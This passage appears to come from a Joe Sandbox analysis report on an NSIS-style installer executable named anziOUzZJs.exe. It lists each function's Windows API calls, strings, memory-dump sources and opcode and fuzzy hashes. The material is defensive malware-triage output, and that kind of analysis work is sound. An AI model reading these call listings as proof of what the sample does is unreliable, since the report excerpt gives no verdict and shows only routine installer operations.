                                      • Instruction ID: a95b2630499809d01a6e7b037cab792d100f7a465f9f887e4e98b5ff960ae470
                                      • Opcode Fuzzy Hash: a8d2051a0b43e45e0548476364d3f5ec7a3e7dc7c9238cb7b637b6be69fa9f30
                                      • Instruction Fuzzy Hash: 79F0A7726082009BE701E7A49949AEE7778DB61314F60057BE241A21C1D7B84985AB3A
                                      Function 00404027 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 205windowstringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004040B2
                                      • GetDlgItem.USER32(00000000,000003E8), ref: 004040C6
                                      • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004040E4
                                      • GetSysColor.USER32(?), ref: 004040F5
                                      • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404104
                                      • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404113
                                      • lstrlenA.KERNEL32(?), ref: 00404116
                                      • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404125
                                      • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 0040413A
                                      • GetDlgItem.USER32(?,0000040A), ref: 0040419C
                                      • SendMessageA.USER32(00000000), ref: 0040419F
                                      • GetDlgItem.USER32(?,000003E8), ref: 004041CA
                                      • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040420A
                                      • LoadCursorA.USER32(00000000,00007F02), ref: 00404219
                                      • SetCursor.USER32(00000000), ref: 00404222
                                      • ShellExecuteA.SHELL32(0000070B,open,004226A0,00000000,00000000,00000001), ref: 00404235
                                      • LoadCursorA.USER32(00000000,00007F00), ref: 00404242
                                      • SetCursor.USER32(00000000), ref: 00404245
                                      • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404271
                                      • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404285
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                      • String ID: : Completed$N$open
                                      • API String ID: 3615053054-3069340868
                                      • Opcode ID: d6331d360d592cb1fcb1934a6ab791839a151b05b6f3426df7f2f496f579edd7
                                      • Instruction ID: f5dd8c80699fee66c1c508087d6ededbe7bbcdfb93c9c5870bdb982cd402330a
                                      • Opcode Fuzzy Hash: d6331d360d592cb1fcb1934a6ab791839a151b05b6f3426df7f2f496f579edd7
                                      • Instruction Fuzzy Hash: 1261C5B1A40209BFEB109F61DC45F6A7B79FB84741F10807AFB057A2D1C7B8A951CB98
                                      Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                      Download Yara Rule
                                      APIs
                                      • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                      • BeginPaint.USER32(?,?), ref: 00401047
                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                      • DeleteObject.GDI32(?), ref: 004010ED
                                      • CreateFontIndirectA.GDI32(?), ref: 00401105
                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                      • DrawTextA.USER32(00000000,00422F00,000000FF,00000010,00000820), ref: 00401156
                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                      • DeleteObject.GDI32(?), ref: 00401165
                                      • EndPaint.USER32(?,?), ref: 0040116E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                      • String ID: F
                                      • API String ID: 941294808-1304234792
                                      • Opcode ID: c0f94b8c962ee7b75acafc3cefd778743504d8a107dd351fe724bfdc705f9f00
                                      • Instruction ID: a0b7ce50fec83efafeb16569406a1c152c04985fcf8b97c7298fc3655e55bd79
                                      • Opcode Fuzzy Hash: c0f94b8c962ee7b75acafc3cefd778743504d8a107dd351fe724bfdc705f9f00
                                      • Instruction Fuzzy Hash: CD419B71804249AFCF058FA4CD459AFBFB9FF44310F00812AF961AA1A0C738EA50DFA5
                                      Function 00405A42 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131stringmemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrcpyA.KERNEL32(00421A98,NUL,?,00000000,?,00000000,00405BD5,?,?), ref: 00405A51
                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,00405BD5,?,?), ref: 00405A75
                                      • GetShortPathNameA.KERNEL32(?,00421A98,00000400), ref: 00405A7E
                                        • Part of subcall function 004058D1: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B2E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004058E1
                                        • Part of subcall function 004058D1: lstrlenA.KERNEL32(00000000,?,00000000,00405B2E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405913
                                      • GetShortPathNameA.KERNEL32(00421E98,00421E98,00000400), ref: 00405A9B
                                      • wsprintfA.USER32 ref: 00405AB9
                                      • GetFileSize.KERNEL32(00000000,00000000,00421E98,C0000000,00000004,00421E98,?,?,?,?,?), ref: 00405AF4
                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405B03
                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B3B
                                      • SetFilePointer.KERNEL32(004093B0,00000000,00000000,00000000,00000000,00421698,00000000,-0000000A,004093B0,00000000,[Rename],00000000,00000000,00000000), ref: 00405B91
                                      • GlobalFree.KERNEL32(00000000), ref: 00405BA2
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405BA9
                                        • Part of subcall function 0040596C: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\anziOUzZJs.exe,80000000,00000003), ref: 00405970
                                        • Part of subcall function 0040596C: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405992
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                      • String ID: %s=%s$NUL$[Rename]
                                      • API String ID: 222337774-4148678300
                                      • Opcode ID: 29faa2ef249efea023fcf9d7dc18c5a7494662307f22d41ae8b698d121cf93b2
                                      • Instruction ID: 42b7cc2c3f2f4ef7c3412fd2f3d3cbe4eee66c4c235e50fd6e5efd85f9217fc4
                                      • Opcode Fuzzy Hash: 29faa2ef249efea023fcf9d7dc18c5a7494662307f22d41ae8b698d121cf93b2
                                      • Instruction Fuzzy Hash: 9931E271A04B19ABD2206B619C89F6B3A6CDF45755F14003AFE05F62D2DA7CBC008E6D
                                      Function 00405F64 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                      Download Yara Rule
                                      APIs
                                      • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\anziOUzZJs.exe",771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000,004030B4,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004032C9), ref: 00405FBC
                                      • CharNextA.USER32(?,?,?,00000000), ref: 00405FC9
                                      • CharNextA.USER32(?,"C:\Users\user\Desktop\anziOUzZJs.exe",771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000,004030B4,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004032C9), ref: 00405FCE
                                      • CharPrevA.USER32(?,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000,004030B4,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004032C9), ref: 00405FDE
                                      Strings
                                      • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405F65
                                      • "C:\Users\user\Desktop\anziOUzZJs.exe", xrefs: 00405FA0
                                      • *?|<>/":, xrefs: 00405FAC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: Char$Next$Prev
                                      • String ID: "C:\Users\user\Desktop\anziOUzZJs.exe"$*?|<>/":$C:\Users\user~1\AppData\Local\Temp\
                                      • API String ID: 589700163-2454393318
                                      • Opcode ID: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
                                      • Instruction ID: a0964663e3c08fb0288e5f4f4a0160773f2bbbf5a4d40b443b4f636863f092b1
                                      • Opcode Fuzzy Hash: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
                                      • Instruction Fuzzy Hash: C611C451808F922EEB3216640C44BBB7F99CF5A760F18007BE9D4B22C2D67C5C429F6E
                                      Function 00403F45 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowLongA.USER32(?,000000EB), ref: 00403F62
                                      • GetSysColor.USER32(00000000), ref: 00403F7E
                                      • SetTextColor.GDI32(?,00000000), ref: 00403F8A
                                      • SetBkMode.GDI32(?,?), ref: 00403F96
                                      • GetSysColor.USER32(?), ref: 00403FA9
                                      • SetBkColor.GDI32(?,?), ref: 00403FB9
                                      • DeleteObject.GDI32(?), ref: 00403FD3
                                      • CreateBrushIndirect.GDI32(?), ref: 00403FDD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                      • String ID:
                                      • API String ID: 2320649405-0
                                      • Opcode ID: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                      • Instruction ID: 563dd17f99c902cd34f005863f03740a6a5938172a6e5e033378c94734032825
                                      • Opcode Fuzzy Hash: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                      • Instruction Fuzzy Hash: B4214271908705ABC7219F68DD48F4BBFF8AF01715B048A29E895E26E0D735EA04CB55
                                      Function 004047DD Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004047F8
                                      • GetMessagePos.USER32 ref: 00404800
                                      • ScreenToClient.USER32(?,?), ref: 0040481A
                                      • SendMessageA.USER32(?,00001111,00000000,?), ref: 0040482C
                                      • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404852
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: Message$Send$ClientScreen
                                      • String ID: f
                                      • API String ID: 41195575-1993550816
                                      • Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                      • Instruction ID: 206dc1e0429e6aa6b627cd25208fa2295557d59b2a7717453fa0c9894da25502
                                      • Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                      • Instruction Fuzzy Hash: E6015276D00259BADB01DB94DC45FFEBBBCAF55711F10412BBA10B61C0C7B4A501CBA5
                                      Function 00402B7F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B9A
                                      • MulDiv.KERNEL32(0001D200,00000064,00072B90), ref: 00402BC5
                                      • wsprintfA.USER32 ref: 00402BD5
                                      • SetWindowTextA.USER32(?,?), ref: 00402BE5
                                      • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BF7
                                      Strings
                                      • verifying installer: %d%%, xrefs: 00402BCF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: Text$ItemTimerWindowwsprintf
                                      • String ID: verifying installer: %d%%
                                      • API String ID: 1451636040-82062127
                                      • Opcode ID: 649971ee7512e9da800057b1e5ac373431693e3f4f1e876899c067cd5a0faa84
                                      • Instruction ID: bd73235a5a2a729140de961e31d76a0e47d27260d0eaef7d75f80e35c4c54abd
                                      • Opcode Fuzzy Hash: 649971ee7512e9da800057b1e5ac373431693e3f4f1e876899c067cd5a0faa84
                                      • Instruction Fuzzy Hash: EF01F471540208BBEF109F60DD49EEE3B79EB04305F008039FA16B51D1D7B59955DF59
                                      Function 00401D38 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDC.USER32(?), ref: 00401D3B
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D48
                                      • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D57
                                      • ReleaseDC.USER32(?,00000000), ref: 00401D68
                                      • CreateFontIndirectA.GDI32(0040A7F0), ref: 00401DB3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                      • String ID: Tahoma
                                      • API String ID: 3808545654-3580928618
                                      • Opcode ID: 54d11e4959632539d7c5822479490e62378c8afe9ef9106c9a33de1f24eaef6b
                                      • Instruction ID: 818c9bdddfe1b1fffd76dbb1b88acba4993fd419864b94457e62d7fc32e1ff32
                                      • Opcode Fuzzy Hash: 54d11e4959632539d7c5822479490e62378c8afe9ef9106c9a33de1f24eaef6b
                                      • Instruction Fuzzy Hash: FE016232948740AFE7416B70AE1AFAA3FB4A755305F108479F201B72E3C67811569B3F
                                      Function 004026C6 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040271A
                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402736
                                      • GlobalFree.KERNEL32(?), ref: 0040276F
                                      • GlobalFree.KERNEL32(00000000), ref: 00402782
                                      • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040279A
                                      • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027AE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                      • String ID:
                                      • API String ID: 2667972263-0
                                      • Opcode ID: 0f1953924fa823fa64f56edeb7276902427a35836a51b24fa44fe1db59ad754c
                                      • Instruction ID: 55e8cf3ffad71cabca96213aa966ad8f6b0c6824c0bc9dabfeb9c0d6c9f08848
                                      • Opcode Fuzzy Hash: 0f1953924fa823fa64f56edeb7276902427a35836a51b24fa44fe1db59ad754c
                                      • Instruction Fuzzy Hash: 03217C71800124BBCF216FA5DE89EAE7A79EF09324F14023AF950762D1C7795D418FA9
                                      Function 004046D3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrlenA.KERNEL32(Concrescences Setup: Completed,Concrescences Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004045EE,000000DF,00000000,00000400,?), ref: 00404771
                                      • wsprintfA.USER32 ref: 00404779
                                      • SetDlgItemTextA.USER32(?,Concrescences Setup: Completed), ref: 0040478C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: ItemTextlstrlenwsprintf
                                      • String ID: %u.%u%s%s$Concrescences Setup: Completed
                                      • API String ID: 3540041739-96654304
                                      • Opcode ID: bbe280539c3cc3020c43bf789c637de2f8d0099704e891219e4d784778b6cf22
                                      • Instruction ID: 079308417c3a62341de1df324b483ce4e469374b9790fc4fe8de96a48b85a08e
                                      • Opcode Fuzzy Hash: bbe280539c3cc3020c43bf789c637de2f8d0099704e891219e4d784778b6cf22
                                      • Instruction Fuzzy Hash: F011A573A0412837EB0065699C45EAF3298DB86374F254637FA25F71D2EA788C5245A8
                                      Function 00402364 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023A2
                                      • lstrlenA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C2
                                      • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023FB
                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
